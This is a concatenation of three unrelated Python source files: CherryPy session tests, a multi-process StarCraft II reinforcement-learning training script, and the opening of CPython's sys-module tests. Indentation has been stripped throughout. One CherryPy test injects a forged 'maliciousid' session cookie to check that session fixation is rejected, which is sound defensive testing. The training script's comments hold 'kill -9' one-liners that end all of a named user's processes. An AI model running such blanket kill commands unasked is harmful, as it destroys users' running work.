self.getPage('/delete', self.cookies)
self.assertBody('done')
self.getPage('/delete', cookieset1)
self.assertBody('done')
def f():
return [
x
for x in os.listdir(localDir)
if x.startswith('session-')
]
self.assertEqual(f(), [])
# Wait for the cleanup thread to delete remaining session files
self.getPage('/')
self.assertNotEqual(f(), [])
time.sleep(2)
self.assertEqual(f(), [])
def test_1_Ram_Concurrency(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.RamSession')
self._test_Concurrency()
@pytest.mark.xfail(reason='#1306')
def test_2_File_Concurrency(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.FileSession')
self._test_Concurrency()
def _test_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage('/')
self.assertBody('1')
cookies = self.cookies
data_dict = {}
errors = []
def request(index):
if self.scheme == 'https':
c = HTTPSConnection('%s:%s' % (self.interface(), self.PORT))
else:
c = HTTPConnection('%s:%s' % (self.interface(), self.PORT))
for i in range(request_count):
c.putrequest('GET', '/')
for k, v in cookies:
c.putheader(k, v)
c.endheaders()
response = c.getresponse()
body = response.read()
if response.status != 200 or not body.isdigit():
errors.append((response.status, body))
else:
data_dict[index] = max(data_dict[index], int(body))
# Uncomment the following line to prove threads overlap.
# sys.stdout.write("%d " % index)
# Start <request_count> requests from each of
# <client_thread_count> concurrent clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
for e in errors:
print(e)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody('FileSession')
def test_4_File_deletion(self):
# Start a new session
self.getPage('/testStr')
# Delete the session file manually and retry.
id = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
path = os.path.join(localDir, 'session-' + id)
os.unlink(path)
self.getPage('/testStr', self.cookies)
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
def test_6_regenerate(self):
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
self.getPage('/regen')
self.assertBody('logged in')
id2 = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
self.assertNotEqual(id1, id2)
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
self.getPage('/testStr',
headers=[
('Cookie',
'session_id=maliciousid; '
'expires=Sat, 27 Oct 2017 04:18:28 GMT; Path=/;')])
id2 = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
self.assertNotEqual(id1, id2)
self.assertNotEqual(id2, 'maliciousid')
def test_7_session_cookies(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.RamSession')
self.getPage('/clear')
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(';')])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
id1 = cookie_parts['temp']
self.assertEqual(list(sessions.RamSession.cache), [id1])
# Send another request in the same "browser session".
self.getPage('/session_cookie', self.cookies)
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(';')])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
self.assertBody(id1)
self.assertEqual(list(sessions.RamSession.cache), [id1])
# Simulate a browser close by just not sending the cookies
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(';')])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
# Assert a new id has been generated...
id2 = cookie_parts['temp']
self.assertNotEqual(id1, id2)
self.assertEqual(set(sessions.RamSession.cache.keys()),
set([id1, id2]))
# Wait for the session.timeout on both sessions
time.sleep(2.5)
cache = list(sessions.RamSession.cache)
if cache:
if cache == [id2]:
self.fail('The second session did not time out.')
else:
self.fail('Unknown session id in cache: %r', cache)
def test_8_Ram_Cleanup(self):
def lock():
s1 = sessions.RamSession()
s1.acquire_lock()
time.sleep(1)
s1.release_lock()
t = threading.Thread(target=lock)
t.start()
start = time.time()
while not sessions.RamSession.locks and time.time() - start < 5:
time.sleep(0.01)
assert len(sessions.RamSession.locks) == 1, 'Lock not acquired'
s2 = sessions.RamSession()
s2.clean_up()
msg = 'Clean up should not remove active lock'
assert len(sessions.RamSession.locks) == 1, msg
t.join()
def is_memcached_available():
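# Probe the default memcached endpoint (127.0.0.1:11211) with a 1-second timeout;
# MemcachedSessionTest below is skipped entirely when no server is reachable.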
host, port = '127.0.0.1', 11211
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See http://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(1.0)
s.connect((host, port))
s.close()
return True
except socket.error:
if s:
s.close()
return False
@pytest.mark.skipif(
not is_memcached_available(),
reason='memcached not reachable',
)
@pytest.mark.importorskip('memcache')
class MemcachedSessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def test_0_Session(self):
self.getPage(
'/set_session_cls/cherrypy.lib.sessions.MemcachedSession'
)
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/length', self.cookies)
self.assertErrorPage(500)
self.assertInBody('NotImplementedError')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(1.25)
self.getPage('/')
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody('True')
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody('done')
def test_1_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage('/')
self.assertBody('1')
cookies = self.cookies
data_dict = {}
def request(index):
for i in range(request_count):
self.getPage('/', cookies)
# Uncomment the following line to prove threads overlap.
# sys.stdout.write("%d " % index)
if not self.body.isdigit():
self.fail(self.body)
data_dict[index] = int(self.body)
# Start <request_count> concurrent requests from
# each of <client_thread_count> clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody('MemcachedSession')
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(
404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
|
eval_mini_srcgame.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
USED_DEVICES = "0,1,2,3"
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES
import sys
import threading
import time
import tensorflow as tf
from absl import app
from absl import flags
from pysc2 import maps
from pysc2.lib import stopwatch
import lib.config as C
import param as P
import mini_source_agent as mini_source_agent
# from pysc2.env import sc2_env
from lib import my_sc2_env as sc2_env
from lib.replay_buffer import Buffer
from mini_network import MiniNetwork
from strategy.terran_agent import DummyTerran
from strategy_env import SimulatePlatform
import unit.protoss_unit as P  # NOTE: re-binds P and shadows the earlier "import param as P"
import unit.terran_unit as T
from datetime import datetime
import multiprocessing as mp
import numpy as np
from logging import warning as logging
FLAGS = flags.FLAGS
flags.DEFINE_bool("training", True, "Whether to train agents.")
flags.DEFINE_bool("on_server", True, "Whether is running on server.")
flags.DEFINE_bool("debug_mode", True, "Whether is debuging")
flags.DEFINE_integer("num_for_update", 100, "Number of episodes for each train.")
flags.DEFINE_string("log_path", "./logs/", "Path for log.")
flags.DEFINE_string("device", USED_DEVICES, "Device for training.")
# Simple64
flags.DEFINE_string("map", "Simple64", "Name of a map to use.")
flags.DEFINE_bool("render", False, "Whether to render with pygame.")
flags.DEFINE_integer("screen_resolution", 64, "Resolution for screen feature layers.")
flags.DEFINE_integer("minimap_resolution", 64, "Resolution for minimap feature layers.")
flags.DEFINE_enum("agent_race", "P", sc2_env.races.keys(), "Agent's race.")
flags.DEFINE_enum("bot_race", "T", sc2_env.races.keys(), "Bot's race.")
flags.DEFINE_enum("difficulty", "7", sc2_env.difficulties.keys(), "Bot's strength.")
flags.DEFINE_integer("max_agent_steps", 18000, "Total agent steps.")
flags.DEFINE_integer("step_mul", 8, "Game steps per agent step.")
flags.DEFINE_bool("profile", False, "Whether to turn on code profiling.")
flags.DEFINE_bool("trace", False, "Whether to trace the code execution.")
flags.DEFINE_bool("save_replay", False, "Whether to replays_save a replay at the end.")
flags.DEFINE_string("replay_dir", "multi-agent/", "dir of replay to replays_save.")
flags.DEFINE_string("restore_model_path", "./model/20200806-151958_source/", "path for restore model")
flags.DEFINE_bool("restore_model", True, "Whether to restore old model")
flags.DEFINE_integer("parallel", 10, "How many processes to run in parallel.")
flags.DEFINE_integer("thread_num", 5, "How many thread to run in the process.")
flags.DEFINE_integer("port_num", 4170, "the start port to create distribute tf")
flags.DEFINE_integer("max_iters", 50, "the rl agent max run iters")
flags.DEFINE_string("game_version", None, "game version of SC2")
FLAGS(sys.argv)
# set the play map
play_map = C.get_map_class('lib.config.' + FLAGS.map)
C.my_sub_pos = play_map.my_sub_pos
C.enemy_sub_pos = play_map.enemy_sub_pos
C.enemy_main_pos = play_map.enemy_main_pos
C.base_camera_pos = play_map.base_camera_pos
if not FLAGS.on_server or FLAGS.debug_mode:
PARALLEL = 1
THREAD_NUM = 1
MAX_AGENT_STEPS = 18000
DEVICE = ['/gpu:0']
NUM_FOR_UPDATE = 2
TRAIN_ITERS = 1
PORT_NUM = FLAGS.port_num
else:
PARALLEL = FLAGS.parallel
THREAD_NUM = FLAGS.thread_num
MAX_AGENT_STEPS = FLAGS.max_agent_steps
DEVICE = ['/gpu:' + dev for dev in FLAGS.device.split(',')]
#DEVICE = ['/cpu:0']
NUM_FOR_UPDATE = FLAGS.num_for_update
TRAIN_ITERS = FLAGS.max_iters
PORT_NUM = FLAGS.port_num
LOG = FLAGS.log_path
if not os.path.exists(LOG):
os.makedirs(LOG)
SERVER_DICT = {"worker": [], "ps": []}
# define some global variables
UPDATE_EVENT, ROLLING_EVENT = threading.Event(), threading.Event()
Counter = 0
Waiting_Counter = 0
Update_Counter = 0
Result_List = []
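# ROLLING_EVENT lets the environment threads keep playing episodes; it is cleared while
# the shared network is being updated. UPDATE_EVENT tells thread 0 that every other
# thread has finished its quota. The counters and Result_List are shared by all threads
# of one worker process (see run_thread below).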
# nohup python eval_mini_srcgame.py > no_action_set_add.out &
# nohup python eval_mini_srcgame.py > action_set_add.out &
# ps -ef |grep liuruoze | grep 'SC2_x64' | awk '{print $2}' | xargs kill -9
# nohup python main.py > result.out &
# kill -9 `ps -ef |grep liuruoze | grep python3 | awk '{print $2}' `
# kill -9 `ps -ef |grep liuruoze | grep eval_mini_srcgame | awk '{print $2}' `
# kill -9 `ps -ef |grep liuruoze | grep eval_mini_srcgame_worldmodel | awk '{print $2}' `
# kill -9 `ps -ef |grep lrz | grep main.py | awk '{print $2}' `
# ps -ef |grep pangzhj | grep 'main.py'
# ps -ef | grep liuruoze | grep -v sshd
# export -n http_proxy
# export -n https_proxy
# kill -9 `ps -ef |grep liuruoze | awk '{print $2}' `
# kill -9 `ps -ef |grep liuruoze | grep test_prototype.py | awk '{print $2}' `
# fuser -v /dev/nvidia*
def run_thread(agent, game_num, Synchronizer, difficulty):
global UPDATE_EVENT, ROLLING_EVENT, Counter, Waiting_Counter, Update_Counter, Result_List
num = 0
all_num = 0
proc_name = mp.current_process().name
C._FPS = 22.4 / FLAGS.step_mul  # the game runs at 22.4 steps/s, so this is the agent's decision rate (2.8 at the default step_mul of 8)
step_mul = FLAGS.step_mul  # game steps per agent step (default 8)
C.difficulty = difficulty
with sc2_env.SC2Env(
map_name=FLAGS.map,
agent_race=FLAGS.agent_race,
bot_race=FLAGS.bot_race,
difficulty=difficulty,
step_mul=step_mul,
score_index=-1,
game_steps_per_episode=MAX_AGENT_STEPS,
screen_size_px=(FLAGS.screen_resolution, FLAGS.screen_resolution),
minimap_size_px=(FLAGS.minimap_resolution, FLAGS.minimap_resolution),
visualize=False,
game_version=FLAGS.game_version) as env:
# env = available_actions_printer.AvailableActionsPrinter(env)
agent.set_env(env)
while all_num != game_num * TRAIN_ITERS:
agent.play(verbose=FLAGS.debug_mode)
if FLAGS.training:
# check if the num of episodes is enough to update
num += 1
all_num += 1
reward = agent.result['reward']
Counter += 1
Result_List.append(reward)
logging("(diff: %d) %d epoch: %s get %d/%d episodes! return: %d!" %
(int(difficulty), Update_Counter, proc_name, len(Result_List), game_num * THREAD_NUM, reward))
# time for update
if num == game_num:
num = 0
ROLLING_EVENT.clear()
# worker stops rolling, wait for update
if agent.index != 0 and THREAD_NUM > 1:
Waiting_Counter += 1
if Waiting_Counter == THREAD_NUM - 1: # wait for all the workers stop
UPDATE_EVENT.set()
ROLLING_EVENT.wait()
# update!
else:
if THREAD_NUM > 1:
UPDATE_EVENT.wait()
Synchronizer.wait() # wait for other processes to update
agent.update_network(Result_List)
Result_List.clear()
agent.global_buffer.reset()
Synchronizer.wait()
Update_Counter += 1
# finish update
UPDATE_EVENT.clear()
Waiting_Counter = 0
ROLLING_EVENT.set()
if FLAGS.save_replay:
env.save_replay(FLAGS.replay_dir)
agent.reset()
def Worker(index, update_game_num, Synchronizer, cluster, model_path):
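# One worker process: joins the TF cluster as worker task `index`, builds a MiniNetwork
# pinned to one of the visible GPUs, spawns THREAD_NUM agent threads that share a single
# replay Buffer, and blocks until the parameter server has initialized all variables.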
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
worker = tf.train.Server(cluster, job_name="worker", task_index=index, config=config)
sess = tf.Session(target=worker.target, config=config)
Net = MiniNetwork(sess=sess, summary_writer=None, rl_training=FLAGS.training,
cluster=cluster, index=index, device=DEVICE[index % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path)
global_buffer = Buffer()
agents = []
for i in range(THREAD_NUM):
agent = mini_source_agent.MiniSourceAgent(index=i, global_buffer=global_buffer, net=Net,
restore_model=FLAGS.restore_model, rl_training=FLAGS.training,
strategy_agent=None)
agents.append(agent)
print("Worker %d: waiting for cluster connection..." % index)
sess.run(tf.report_uninitialized_variables())
print("Worker %d: cluster ready!" % index)
while len(sess.run(tf.report_uninitialized_variables())):
print("Worker %d: waiting for variable initialization..." % index)
time.sleep(1)
print("Worker %d: variables initialized" % index)
game_num = int(np.ceil(update_game_num / THREAD_NUM))  # round up so each thread plays enough episodes per update
UPDATE_EVENT.clear()
ROLLING_EVENT.set()
# Run threads
threads = []
for i in range(THREAD_NUM - 1):
t = threading.Thread(target=run_thread, args=(agents[i], game_num, Synchronizer, FLAGS.difficulty))
threads.append(t)
t.daemon = True
t.start()
time.sleep(3)
run_thread(agents[-1], game_num, Synchronizer, FLAGS.difficulty)
for t in threads:
t.join()
def Parameter_Server(Synchronizer, cluster, log_path, model_path, procs):
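# Parameter server (task 0 of the "ps" job): initializes the shared variables, then for
# each training iteration waits at the barrier before and after the workers' update,
# logs the win rate, and checkpoints the model whenever the win rate matches or beats
# the best seen so far.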
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
server = tf.train.Server(cluster, job_name="ps", task_index=0, config=config)
sess = tf.Session(target=server.target, config=config)
summary_writer = tf.summary.FileWriter(log_path)
Net = MiniNetwork(sess=sess, summary_writer=summary_writer, rl_training=FLAGS.training,
cluster=cluster, index=0, device=DEVICE[0 % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path)
agent = mini_source_agent.MiniSourceAgent(index=-1, net=Net, restore_model=FLAGS.restore_model, rl_training=FLAGS.training)
print("Parameter server: waiting for cluster connection...")
sess.run(tf.report_uninitialized_variables())
print("Parameter server: cluster ready!")
print("Parameter server: initializing variables...")
agent.init_network()
print("Parameter server: variables initialized")
update_counter = 0
max_win_rate = 0.
while update_counter < TRAIN_ITERS:
agent.reset_old_network()
# wait for update
Synchronizer.wait()
logging("Update Network!")
# TODO: time the update step and compare CPU vs. GPU
time.sleep(1)
# update finish
Synchronizer.wait()
logging("Update Network finished!")
steps, win_rate = agent.update_summary(update_counter)
logging("Steps: %d, win rate: %f" % (steps, win_rate))
update_counter += 1
if win_rate >= max_win_rate:
agent.save_model()
max_win_rate = win_rate
return max_win_rate
def _main(unused_argv):
# create distribute tf cluster
start_port = PORT_NUM
SERVER_DICT["ps"].append("localhost:%d" % start_port)
for i in range(PARALLEL):
SERVER_DICT["worker"].append("localhost:%d" % (start_port + 1 + i))
Cluster = tf.train.ClusterSpec(SERVER_DICT)
now = datetime.now()
model_path = "./model/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
if not os.path.exists(model_path):
os.makedirs(model_path)
log_path = "./logs/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
UPDATE_GAME_NUM = NUM_FOR_UPDATE
per_update_num = np.ceil(UPDATE_GAME_NUM / PARALLEL)
Synchronizer = mp.Barrier(PARALLEL + 1)
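# Barrier across the PARALLEL worker processes plus the parameter server, so every
# network update is synchronized across all processes.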
# Run parallel process
procs = []
for index in range(PARALLEL):
p = mp.Process(name="Worker_%d" % index, target=Worker, args=(index, per_update_num, Synchronizer, Cluster, model_path))
procs.append(p)
p.daemon = True
p.start()
time.sleep(1)
win_rate = Parameter_Server(Synchronizer, Cluster, log_path, model_path, procs)
print('#######################')
print('Final Win_rate:', win_rate)
print('#######################')
for p in procs:
p.join()
'''
if FLAGS.profile:
print(stopwatch.sw)
'''
if __name__ == "__main__":
app.run(_main)
|
test_sys.py
|
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
from test.support import import_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
DICT_KEY_STRUCT_FORMAT = 'n2BI2n'
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
with self.assertRaises(RecursionError):
f()
with self.assertRaises(RecursionError):
f()
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than limit.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
set_recursion_limit_at_depth(limit, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
@threading_helper.reap_threads
def test_current_exceptions(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_exceptions(), and verifies that the
# entries returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
while True:
try:
raise ValueError("oops")
except ValueError:
if leave_g.wait(timeout=support.LONG_TIMEOUT):
break
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_exceptions()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
